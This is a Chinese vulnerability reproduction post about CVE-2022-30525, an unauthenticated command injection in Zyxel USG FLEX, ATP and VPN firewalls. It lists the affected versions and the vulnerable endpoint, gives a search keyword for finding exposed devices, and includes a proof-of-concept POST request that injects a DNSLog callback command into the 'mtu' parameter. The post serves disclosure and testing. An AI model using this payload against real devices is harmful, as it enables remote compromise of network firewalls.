漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

admin 2022年5月17日19:05:41评论787 views字数 988阅读3分17秒阅读模式
漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)
前言

Rapid7 发现并报告了一个漏洞,该漏洞影响支持零接触配置 (ZTP) Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和USG FLEX 系列(包括 USG20-VPN USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。


漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

漏洞影响

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)


型号
版本

USG FLEX 100、100W、200、500、700

ZLD5.00 至 ZLD5.21 补丁 

USG20-VPN、USG20W-VP

ZLD5.10 至 ZLD5.21 补丁 

ATP 100、200、500、700、80

ZLD5.10 至 ZLD5.21 补丁 


漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

漏洞描述

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

受影响的模型容易受到通过管理 HTTP 接口进行未经身份验证的远程命令注入的攻击。命令以nobody用户身份执行。

此漏洞通过/ztp/cgi-bin/handlerURI 被利用,并且是将未经过滤的攻击者输入传递os.systemlib_wan_settings.py. setWanPortSt易受攻击的功能与命令相关联被调用。攻击者可以将任意命令注入到mtudata参数中。

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

关键词

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

title=”USG FLEX”


漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

复现

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

检测目标存在漏洞

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

手工验证,访问目标并抓包

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

更改提交方式和参数

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

成功ping通DNSLog

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

poc:

POST /ztp/cgi-bin/handler{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":";{dnslog};","data":"hi"}

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

参考链接

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)
https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/https://github.com/M4fiaB0y/CVE-2022-30525


漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

END

• 往期精选

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)
漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

windows提权总结

一次SSH爆破攻击haiduc工具的应急响应

记一次艰难的SQL注入(过安全狗)

记一次溯源

漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

下方点击关注发现更多精彩


原文始发于微信公众号(银河护卫队super):漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月17日19:05:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)https://cn-sec.com/archives/1015018.html

发表评论

匿名网友 填写信息